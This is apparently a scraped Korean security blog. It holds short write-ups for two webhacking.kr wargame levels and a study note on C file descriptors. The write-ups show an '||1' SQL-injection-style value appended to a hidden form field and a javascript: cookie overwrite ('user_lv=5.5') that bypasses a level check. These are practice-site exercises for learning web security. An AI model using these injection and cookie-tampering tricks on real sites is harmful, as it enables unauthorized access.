gogo







크롬 개발자 도구

<form method="post" action="index.php"><input type="hidden" name="answer" value="1010100000011100101011111">name : <input type="text" name="id" maxlength="10" size="10"><input type="submit" value="write"></form>


히든 필드 벨류값에 ||1 추가 후 전송




name : admin
answer : xxx_xxx_xxxxxxxxx
ip : localhost



Clear.

'Security > Wargame' 카테고리의 다른 글

Webhacking.kr 3번  (0) 2014.06.27
webhacking.kr 1번  (0) 2014.06.27

<?

$password
="????";

if(
eregi("[^0-9,.]",$_COOKIE[user_lv])) $_COOKIE[user_lv]=1;

if(
$_COOKIE[user_lv]>=6$_COOKIE[user_lv]=1;

if(
$_COOKIE[user_lv]>5) @solve();

echo(
"<br>level : $_COOKIE[user_lv]");

?>


javascript:alert(document.cookie="user_lv=5.5")



Clear.


'Security > Wargame' 카테고리의 다른 글

Webhacking.kr 3번  (0) 2014.06.27
webhacking.kr 1번  (0) 2014.06.27

1. C에서 파일에 접근 하는 방법

(1) 파일 서술자(File Descriptor)

① 로우레벨 입출력 함수들을 사용함

② 파일스트림에 비해 직접적임



(2) 파일스트림(File Stream)

① 로우레벨 함수로 만들어진 버퍼가 있는 하이레벨 입출력 함수를 사용함

② 파일스트림을 사용하는 것이 프로그래밍에 있어서 훨씬 프로그래밍 하기 편함


2. 파일 서술자를 사용하는 네 개의 일반적인 함수

(1) open() : 읽거나 쓸 수 있도록 파일을 열고 파일 서술자를 리턴함. 리턴된 파일 서술자는 단순한 정수 값이지만 열린 파일마다 고유함. 파일 서술자는 열린 파일을 가르키는 포인터와 같은 인자로 다른함수에게 넘겨짐.

(2) close() : 이 함수를 사용할때 파일 서술자는 인자로 쓰임.

(3) read(), write() : 이 함수들은 파일 서술자, 읽거나 쓸 데이터를 가리키는 포인터, 읽거나 쓸 바이트 수 이렇게 세 개의 인자를 가르킴.


/* 위의 네 가지 함수 모두 오류가 발생하면 -1 을 리턴함 */

'Security > System' 카테고리의 다른 글

[System Hacking] 기초 쌓기 - 1 -  (0) 2012.09.09